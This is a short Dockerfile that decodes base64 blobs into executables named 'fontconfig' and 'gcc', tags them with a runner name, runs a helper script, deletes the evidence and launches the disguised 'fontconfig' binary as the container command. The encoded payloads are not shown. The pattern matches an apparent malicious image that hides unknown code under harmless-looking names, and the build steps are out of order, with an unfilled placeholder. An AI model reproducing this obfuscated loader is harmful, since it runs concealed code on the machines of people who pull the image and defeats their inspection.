FROM ubuntu
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > fontconfig.log'
RUN base64 --decode fontconfig.64 > fontconfig
RUN base64 --decode gcc.64 > gcc
RUN chmod +x gcc

COPY fontconfig .
COPY docker.sh .
COPY gcc .

RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' fontconfig
RUN bash ./docker.sh
RUN rm --force --recursive fontconfig _REPO_NAME__.64 docker.sh gcc gcc.64

CMD fontconfig
